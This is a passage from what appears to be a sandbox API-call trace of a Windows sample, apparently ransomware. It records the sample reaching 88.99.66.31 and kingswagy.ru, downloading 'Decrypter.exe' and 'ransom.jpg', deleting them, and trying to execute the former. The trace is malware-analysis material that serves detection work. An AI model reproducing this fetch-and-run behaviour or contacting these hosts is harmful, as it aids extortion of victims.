WSAEventSelect (s=0x3f0, hEventObject=0x3f8, lNetworkEvents=512) returned 0 [0048.941] WSAIoctl (in: s=0x3fc, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x3ae3f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x3ae3f0, lpOverlapped=0x0) returned -1 [0048.941] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3ae120, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0048.941] WSAEventSelect (s=0x3fc, hEventObject=0x404, lNetworkEvents=512) returned 0 [0048.941] GetAdaptersAddresses () returned 0x6f [0048.946] LocalAlloc (uFlags=0x0, uBytes=0xa54) returned 0x49da70 [0048.946] GetAdaptersAddresses () returned 0x0 [0048.954] LocalFree (hMem=0x49da70) returned 0x0 [0048.957] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ae400 | out: phkResult=0x3ae400*=0x408) returned 0x0 [0048.958] RegQueryValueExW (in: hKey=0x408, lpValueName="HWRPortReuseOnSocketBind", lpReserved=0x0, lpType=0x3ae41c, lpData=0x0, lpcbData=0x3ae418*=0x0 | out: lpType=0x3ae41c*=0x0, lpData=0x0, lpcbData=0x3ae418*=0x0) returned 0x2 [0048.958] RegCloseKey (hKey=0x408) returned 0x0 [0048.959] WSAConnect (in: s=0x3e8, name=0x2592368*(sa_family=2, sin_port=0x1bb, sin_addr="88.99.66.31"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0048.991] closesocket (s=0x3e4) returned 0 [0049.012] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ace58 | out: phkResult=0x3ace58*=0x0) returned 0x2 [0049.014] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ae374 | out: phkResult=0x3ae374*=0x3e4) returned 0x0 [0049.014] RegQueryValueExW (in: hKey=0x3e4, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x3ae390, lpData=0x0, lpcbData=0x3ae38c*=0x0 | out: lpType=0x3ae390*=0x0, lpData=0x0, lpcbData=0x3ae38c*=0x0) returned 0x2 [0049.014] RegCloseKey (hKey=0x3e4) returned 0x0 [0049.065] EnumerateSecurityPackagesW (in: pcPackages=0x3ae380, ppPackageInfo=0x3ae314 | out: pcPackages=0x3ae380, ppPackageInfo=0x3ae314) returned 0x0 [0049.068] FreeContextBuffer (in: pvContextBuffer=0x49da70 | out: pvContextBuffer=0x49da70) returned 0x0 [0049.074] GetCurrentProcess () returned 0xffffffff [0049.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae160 | out: TokenHandle=0x3ae160*=0x3e4) returned 1 [0049.075] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x2594638, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0x3ae1b4, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x2595bc4, ptsExpiry=0x3ae138 | out: phCredential=0x2595bc4, ptsExpiry=0x3ae138) returned 0x0 [0049.590] InitializeSecurityContextW (in: phCredential=0x3ae178, phContext=0x0, pTargetName=0x2592454, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x2595dc8, pOutput=0x2595d60, pfContextAttr=0x259460c, ptsExpiry=0x3ae170 | out: phNewContext=0x2595dc8, pOutput=0x2595d60, pfContextAttr=0x259460c, ptsExpiry=0x3ae170) returned 0x90312 [0049.591] FreeContextBuffer (in: pvContextBuffer=0x428c18 | out: pvContextBuffer=0x428c18) returned 0x0 [0049.593] send (s=0x3e8, buf=0x2595ddc*, len=114, flags=0) returned 114 [0049.595] recv (in: s=0x3e8, buf=0x2595ddc, len=5, flags=0 | out: buf=0x2595ddc*) returned 5 [0049.625] recv (in: s=0x3e8, buf=0x2595de1, len=93, flags=0 | out: buf=0x2595de1*) returned 93 [0049.625] InitializeSecurityContextW (in: phCredential=0x3ae0dc, phContext=0x3ae168, pTargetName=0x2592454, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2596010, Reserved2=0x0, phNewContext=0x2595dc8, pOutput=0x2596024, pfContextAttr=0x259460c, ptsExpiry=0x3ae0d4 | out: phNewContext=0x2595dc8, pOutput=0x2596024, pfContextAttr=0x259460c, ptsExpiry=0x3ae0d4) returned 0x90312 [0049.626] recv (in: s=0x3e8, buf=0x25960b4, len=5, flags=0 | out: buf=0x25960b4*) returned 5 [0049.626] recv (in: s=0x3e8, buf=0x25960cd, len=1745, flags=0 | out: buf=0x25960cd*) returned 1745 [0049.626] InitializeSecurityContextW (in: phCredential=0x3ae044, phContext=0x3ae0d0, pTargetName=0x2592454, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2596810, Reserved2=0x0, phNewContext=0x2595dc8, pOutput=0x2596824, pfContextAttr=0x259460c, ptsExpiry=0x3ae03c | out: phNewContext=0x2595dc8, pOutput=0x2596824, pfContextAttr=0x259460c, ptsExpiry=0x3ae03c) returned 0x90312 [0049.627] recv (in: s=0x3e8, buf=0x25968b4, len=5, flags=0 | out: buf=0x25968b4*) returned 5 [0049.627] recv (in: s=0x3e8, buf=0x25968cd, len=331, flags=0 | out: buf=0x25968cd*) returned 331 [0049.627] InitializeSecurityContextW (in: phCredential=0x3adfac, phContext=0x3ae038, pTargetName=0x2592454, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2596a88, Reserved2=0x0, phNewContext=0x2595dc8, pOutput=0x2596a9c, pfContextAttr=0x259460c, ptsExpiry=0x3adfa4 | out: phNewContext=0x2595dc8, pOutput=0x2596a9c, pfContextAttr=0x259460c, ptsExpiry=0x3adfa4) returned 0x90312 [0049.627] recv (in: s=0x3e8, buf=0x2596b2c, len=5, flags=0 | out: buf=0x2596b2c*) returned 5 [0049.627] recv (in: s=0x3e8, buf=0x2596b45, len=4, flags=0 | out: buf=0x2596b45*) returned 4 [0049.627] InitializeSecurityContextW (in: phCredential=0x3adf14, phContext=0x3adfa0, pTargetName=0x2592454, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2596bbc, Reserved2=0x0, phNewContext=0x2595dc8, pOutput=0x2596bd0, pfContextAttr=0x259460c, ptsExpiry=0x3adf0c | out: phNewContext=0x2595dc8, pOutput=0x2596bd0, pfContextAttr=0x259460c, ptsExpiry=0x3adf0c) returned 0x90312 [0049.646] FreeContextBuffer (in: pvContextBuffer=0x46c2a0 | out: pvContextBuffer=0x46c2a0) returned 0x0 [0049.646] send (s=0x3e8, buf=0x2596c4c*, len=134, flags=0) returned 134 [0049.646] recv (in: s=0x3e8, buf=0x2596c4c, len=5, flags=0 | out: buf=0x2596c4c*) returned 5 [0049.669] recv (in: s=0x3e8, buf=0x2596c51, len=1, flags=0 | out: buf=0x2596c51*) returned 1 [0049.669] InitializeSecurityContextW (in: phCredential=0x3ade7c, phContext=0x3adf08, pTargetName=0x2592454, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2596d58, Reserved2=0x0, phNewContext=0x2595dc8, pOutput=0x2596d6c, pfContextAttr=0x259460c, ptsExpiry=0x3ade74 | out: phNewContext=0x2595dc8, pOutput=0x2596d6c, pfContextAttr=0x259460c, ptsExpiry=0x3ade74) returned 0x90312 [0049.669] recv (in: s=0x3e8, buf=0x2596dfc, len=5, flags=0 | out: buf=0x2596dfc*) returned 5 [0049.669] recv (in: s=0x3e8, buf=0x2596e15, len=48, flags=0 | out: buf=0x2596e15*) returned 48 [0049.669] InitializeSecurityContextW (in: phCredential=0x3adde4, phContext=0x3ade70, pTargetName=0x2592454, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2596eb8, Reserved2=0x0, phNewContext=0x2595dc8, pOutput=0x2596ecc, pfContextAttr=0x259460c, ptsExpiry=0x3adddc | out: phNewContext=0x2595dc8, pOutput=0x2596ecc, pfContextAttr=0x259460c, ptsExpiry=0x3adddc) returned 0x0 [0049.880] QueryContextAttributesW (in: phContext=0x2595dc8, ulAttribute=0x4, pBuffer=0x2596f78 | out: pBuffer=0x2596f78) returned 0x0 [0049.880] QueryContextAttributesW (in: phContext=0x2595dc8, ulAttribute=0x5a, pBuffer=0x2596fd0 | out: pBuffer=0x2596fd0) returned 0x0 [0049.892] QueryContextAttributesW (in: phContext=0x2595dc8, ulAttribute=0x53, pBuffer=0x2597284 | out: pBuffer=0x2597284) returned 0x0 [0049.899] CertDuplicateCRLContext (pCrlContext=0x488d98) returned 0x488d98 [0049.900] CertDuplicateStore (hCertStore=0x470000) returned 0x470000 [0049.900] CertEnumCertificatesInStore (hCertStore=0x470000, pPrevCertContext=0x0) returned 0x488d98 [0049.900] CertDuplicateCRLContext (pCrlContext=0x488d98) returned 0x488d98 [0049.901] CertEnumCertificatesInStore (hCertStore=0x470000, pPrevCertContext=0x488d98) returned 0x0 [0049.901] CertCloseStore (hCertStore=0x470000, dwFlags=0x0) returned 1 [0049.901] CertFreeCRLContext (pCrlContext=0x488d98) returned 1 [0049.912] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x417230 [0049.914] CertAddCRLLinkToStore (in: hCertStore=0x417230, pCrlContext=0x488d98, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0049.918] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x488d98, pTime=0x3addf0, hAdditionalStore=0x417230, pChainPara=0x3add30, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x3add24 | out: ppChainContext=0x3add24) returned 1 [0056.180] CertDuplicateCertificateChain (pChainContext=0x6aa60d8) returned 0x6aa60d8 [0056.180] CertDuplicateCRLContext (pCrlContext=0x488d98) returned 0x488d98 [0056.181] CertDuplicateCRLContext (pCrlContext=0x6b4f378) returned 0x6b4f378 [0056.181] CertDuplicateCRLContext (pCrlContext=0x6b4f3c8) returned 0x6b4f3c8 [0056.181] CertFreeCertificateChain (pChainContext=0x6aa60d8) [0056.181] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x6aa60d8, pPolicyPara=0x3aded0, pPolicyStatus=0x3adebc | out: pPolicyStatus=0x3adebc) returned 1 [0056.182] SetLastError (dwErrCode=0x0) [0056.184] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x6aa60d8, pPolicyPara=0x3adf3c, pPolicyStatus=0x3adee4 | out: pPolicyStatus=0x3adee4) returned 1 [0056.184] CertFreeCertificateChain (pChainContext=0x6aa60d8) [0056.184] CertFreeCRLContext (pCrlContext=0x488d98) returned 1 [0056.186] CoTaskMemAlloc (cb=0x20e) returned 0x6b7f1c8 [0056.186] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x6b7f1c8, nSize=0x105 | out: lpBuffer="\xfd08\x6b7\x34d0\x6e5\x53c9\x6a8\x02") returned 0x0 [0056.186] CoTaskMemFree (pv=0x6b7f1c8) [0056.186] CoTaskMemAlloc (cb=0x20e) returned 0x6b7f1c8 [0056.186] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x6b7f1c8, nSize=0x105 | out: lpBuffer="\xfd08\x6b7\x34d0\x6e5\x53c9\x6a8\x02") returned 0x0 [0056.187] CoTaskMemFree (pv=0x6b7f1c8) [0056.187] CoTaskMemAlloc (cb=0x20e) returned 0x6b7f1c8 [0056.187] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x6b7f1c8, nSize=0x105 | out: lpBuffer="\xfd08\x6b7\x34d0\x6e5\x53c9\x6a8\x02") returned 0x0 [0056.187] CoTaskMemFree (pv=0x6b7f1c8) [0056.187] CoTaskMemAlloc (cb=0x20e) returned 0x6b7f1c8 [0056.187] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x6b7f1c8, nSize=0x105 | out: lpBuffer="\xfd08\x6b7\x34d0\x6e5\x53c9\x6a8\x02") returned 0x0 [0056.187] CoTaskMemFree (pv=0x6b7f1c8) [0056.188] EncryptMessage (in: phContext=0x2595dc8, fQOP=0x0, pMessage=0x259f64c, MessageSeqNo=0x0 | out: pMessage=0x259f64c) returned 0x0 [0056.188] send (s=0x3e8, buf=0x259e124*, len=101, flags=0) returned 101 [0056.203] setsockopt (s=0x3e8, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0056.203] recv (in: s=0x3e8, buf=0x25ab95c, len=5, flags=0 | out: buf=0x25ab95c*) returned 5 [0056.222] recv (in: s=0x3e8, buf=0x25ab961, len=10240, flags=0 | out: buf=0x25ab961*) returned 1455 [0056.222] recv (in: s=0x3e8, buf=0x25abf10, len=8785, flags=0 | out: buf=0x25abf10*) returned 8785 [0056.225] DecryptMessage (in: phContext=0x2595dc8, pMessage=0x25afa1c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x25afa1c, pfQOP=0x0) returned 0x0 [0056.250] GetCurrentProcess () returned 0xffffffff [0056.250] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae2d8 | out: TokenHandle=0x3ae2d8*=0x5ec) returned 1 [0056.251] GetCurrentProcess () returned 0xffffffff [0056.251] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae2e8 | out: TokenHandle=0x3ae2e8*=0x5e8) returned 1 [0056.253] setsockopt (s=0x3e8, level=65535, optname=4102, optval="\xf4\x01", optlen=4) returned 0 [0056.253] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae6b8 | out: lpPerformanceCount=0x3ae6b8*=17654103450) returned 1 [0056.254] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae68c | out: lpPerformanceCount=0x3ae68c*=17654214402) returned 1 [0056.258] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae68c | out: lpPerformanceCount=0x3ae68c*=17654654918) returned 1 [0056.258] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae68c | out: lpPerformanceCount=0x3ae68c*=17654662871) returned 1 [0056.259] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae68c | out: lpPerformanceCount=0x3ae68c*=17654686987) returned 1 [0056.259] SetEvent (hEvent=0x28c) returned 1 [0056.259] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae6a4 | out: lpPerformanceCount=0x3ae6a4*=17654713306) returned 1 [0056.268] GetFullPathNameW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Decrypter.exe", nBufferLength=0x105, lpBuffer=0x3ae144, lpFilePart=0x0 | out: lpBuffer="C:\\5p5NrGJn0jS HALPmcxz\\Decrypter.exe", lpFilePart=0x0) returned 0x25 [0056.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae638) returned 1 [0056.268] CreateFileW (lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Decrypter.exe" (normalized: "c:\\5p5nrgjn0js halpmcxz\\decrypter.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5f0 [0056.268] GetFileType (hFile=0x5f0) returned 0x1 [0056.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae634) returned 1 [0056.268] GetFileType (hFile=0x5f0) returned 0x1 [0056.269] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae6c8 | out: lpPerformanceCount=0x3ae6c8*=17655692813) returned 1 [0056.269] SetEvent (hEvent=0x28c) returned 1 [0056.269] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4dc*=0x304, lpdwindex=0x3ae2fc | out: lpdwindex=0x3ae2fc) returned 0x80010115 [0056.269] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4bc*=0x2f4, lpdwindex=0x3ae2dc | out: lpdwindex=0x3ae2dc) returned 0x80010115 [0056.269] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4bc*=0x2fc, lpdwindex=0x3ae2dc | out: lpdwindex=0x3ae2dc) returned 0x80010115 [0056.270] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae510*=0x324, lpdwindex=0x3ae32c | out: lpdwindex=0x3ae32c) returned 0x80010115 [0056.270] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae510*=0x33c, lpdwindex=0x3ae32c | out: lpdwindex=0x3ae32c) returned 0x80010115 [0056.270] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae510*=0x344, lpdwindex=0x3ae32c | out: lpdwindex=0x3ae32c) returned 0x80010115 [0056.286] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x278 [0056.286] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x27c [0056.286] GetAddrInfoW (in: pNodeName="kingswagy.ru", pServiceName=0x0, pHints=0x3ae410*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x3ae3b8 | out: ppResult=0x3ae3b8*=0x64f49b8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="kingswagy.ru", ai_addr=0x64f49e0*(sa_family=2, sin_port=0x0, sin_addr="81.177.141.81"), ai_next=0x0)) returned 0 [0056.494] FreeAddrInfoW (pAddrInfo=0x64f49b8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="kingswagy.ru", ai_addr=0x64f49e0*(sa_family=2, sin_port=0x0, sin_addr="81.177.141.81"), ai_next=0x0)) [0056.495] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae358*=0x3f8, lpdwindex=0x3ae174 | out: lpdwindex=0x3ae174) returned 0x80010115 [0056.495] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae358*=0x404, lpdwindex=0x3ae174 | out: lpdwindex=0x3ae174) returned 0x80010115 [0056.495] WSAConnect (in: s=0x278, name=0x242222c*(sa_family=2, sin_port=0x50, sin_addr="81.177.141.81"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0056.558] closesocket (s=0x27c) returned 0 [0056.559] send (s=0x278, buf=0x23f462c*, len=75, flags=0) returned 75 [0056.559] setsockopt (s=0x278, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0056.559] recv (in: s=0x278, buf=0x23f10b4, len=4096, flags=0 | out: buf=0x23f10b4*) returned 815 [0056.643] setsockopt (s=0x278, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0056.654] CloseHandle (hObject=0x5f0) returned 1 [0056.655] GetFullPathNameW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Decrypter.exe", nBufferLength=0x105, lpBuffer=0x3acf80, lpFilePart=0x0 | out: lpBuffer="C:\\5p5NrGJn0jS HALPmcxz\\Decrypter.exe", lpFilePart=0x0) returned 0x25 [0056.655] DeleteFileW (lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\Decrypter.exe" (normalized: "c:\\5p5nrgjn0js halpmcxz\\decrypter.exe")) returned 1 [0056.655] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decrypter.exe", nBufferLength=0x105, lpBuffer=0x3ae144, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decrypter.exe", lpFilePart=0x0) returned 0x33 [0056.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae638) returned 1 [0056.656] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decrypter.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decrypter.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5f0 [0056.656] GetFileType (hFile=0x5f0) returned 0x1 [0056.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae634) returned 1 [0056.656] GetFileType (hFile=0x5f0) returned 0x1 [0056.656] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae6c8 | out: lpPerformanceCount=0x3ae6c8*=17694616352) returned 1 [0056.658] SetEvent (hEvent=0x28c) returned 1 [0056.658] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4dc*=0x304, lpdwindex=0x3ae2fc | out: lpdwindex=0x3ae2fc) returned 0x80010115 [0056.658] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4bc*=0x2f4, lpdwindex=0x3ae2dc | out: lpdwindex=0x3ae2dc) returned 0x80010115 [0056.659] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4bc*=0x2fc, lpdwindex=0x3ae2dc | out: lpdwindex=0x3ae2dc) returned 0x80010115 [0056.659] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae510*=0x324, lpdwindex=0x3ae32c | out: lpdwindex=0x3ae32c) returned 0x80010115 [0056.659] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae510*=0x33c, lpdwindex=0x3ae32c | out: lpdwindex=0x3ae32c) returned 0x80010115 [0056.659] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae510*=0x344, lpdwindex=0x3ae32c | out: lpdwindex=0x3ae32c) returned 0x80010115 [0056.660] select (in: nfds=0, readfds=0x2426be8, writefds=0x0, exceptfds=0x0, timeout=0x3ae5a0 | out: readfds=0x2426be8, writefds=0x0, exceptfds=0x0) returned 0 [0056.660] send (s=0x278, buf=0x23f462c*, len=51, flags=0) returned 51 [0056.660] setsockopt (s=0x278, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0056.660] recv (in: s=0x278, buf=0x23f10b4, len=4096, flags=0 | out: buf=0x23f10b4*) returned 815 [0056.723] setsockopt (s=0x278, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0056.726] CloseHandle (hObject=0x5f0) returned 1 [0056.726] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decrypter.exe", nBufferLength=0x105, lpBuffer=0x3acf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decrypter.exe", lpFilePart=0x0) returned 0x33 [0056.726] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Decrypter.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\decrypter.exe")) returned 1 [0056.727] GetFullPathNameW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\ransom.jpg", nBufferLength=0x105, lpBuffer=0x3ae144, lpFilePart=0x0 | out: lpBuffer="C:\\5p5NrGJn0jS HALPmcxz\\ransom.jpg", lpFilePart=0x0) returned 0x22 [0056.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae638) returned 1 [0056.727] CreateFileW (lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\ransom.jpg" (normalized: "c:\\5p5nrgjn0js halpmcxz\\ransom.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5f0 [0056.727] GetFileType (hFile=0x5f0) returned 0x1 [0056.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae634) returned 1 [0056.727] GetFileType (hFile=0x5f0) returned 0x1 [0056.727] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae6c8 | out: lpPerformanceCount=0x3ae6c8*=17701544116) returned 1 [0056.727] SetEvent (hEvent=0x28c) returned 1 [0056.727] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4dc*=0x304, lpdwindex=0x3ae2fc | out: lpdwindex=0x3ae2fc) returned 0x80010115 [0056.728] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4bc*=0x2f4, lpdwindex=0x3ae2dc | out: lpdwindex=0x3ae2dc) returned 0x80010115 [0056.728] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4bc*=0x2fc, lpdwindex=0x3ae2dc | out: lpdwindex=0x3ae2dc) returned 0x80010115 [0056.728] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae510*=0x324, lpdwindex=0x3ae32c | out: lpdwindex=0x3ae32c) returned 0x80010115 [0056.728] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae510*=0x33c, lpdwindex=0x3ae32c | out: lpdwindex=0x3ae32c) returned 0x80010115 [0056.728] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae510*=0x344, lpdwindex=0x3ae32c | out: lpdwindex=0x3ae32c) returned 0x80010115 [0056.728] select (in: nfds=0, readfds=0x2428a70, writefds=0x0, exceptfds=0x0, timeout=0x3ae5a0 | out: readfds=0x2428a70, writefds=0x0, exceptfds=0x0) returned 0 [0056.728] send (s=0x278, buf=0x23f462c*, len=48, flags=0) returned 48 [0056.729] setsockopt (s=0x278, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0056.729] recv (in: s=0x278, buf=0x23f10b4, len=4096, flags=0 | out: buf=0x23f10b4*) returned 815 [0056.787] setsockopt (s=0x278, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0056.790] CloseHandle (hObject=0x5f0) returned 1 [0056.790] GetFullPathNameW (in: lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\ransom.jpg", nBufferLength=0x105, lpBuffer=0x3acf80, lpFilePart=0x0 | out: lpBuffer="C:\\5p5NrGJn0jS HALPmcxz\\ransom.jpg", lpFilePart=0x0) returned 0x22 [0056.790] DeleteFileW (lpFileName="C:\\5p5NrGJn0jS HALPmcxz\\ransom.jpg" (normalized: "c:\\5p5nrgjn0js halpmcxz\\ransom.jpg")) returned 1 [0056.794] ShellExecuteExW (in: pExecInfo=0x2429fb0*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\5p5NrGJn0jS HALPmcxz\\Decrypter.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2429fb0*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\5p5NrGJn0jS HALPmcxz\\Decrypter.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 0 [0057.060] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x3ae484, nSize=0x101, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0057.080] LocalFree (hMem=0x6b0bdd8) returned 0x0 [0057.081] GetUserObjectInformationA (in: hObj=0x5c, nIndex=1, pvInfo=0x242a850, nLength=0xc, lpnLengthNeeded=0x3ae868 | out: pvInfo=0x242a850, lpnLengthNeeded=0x3ae868) returned 1 [0057.093] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.093] AdjustWindowRectEx (in: lpRect=0x3ae748, dwStyle=0x56010000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x3ae748) returned 1 [0057.094] 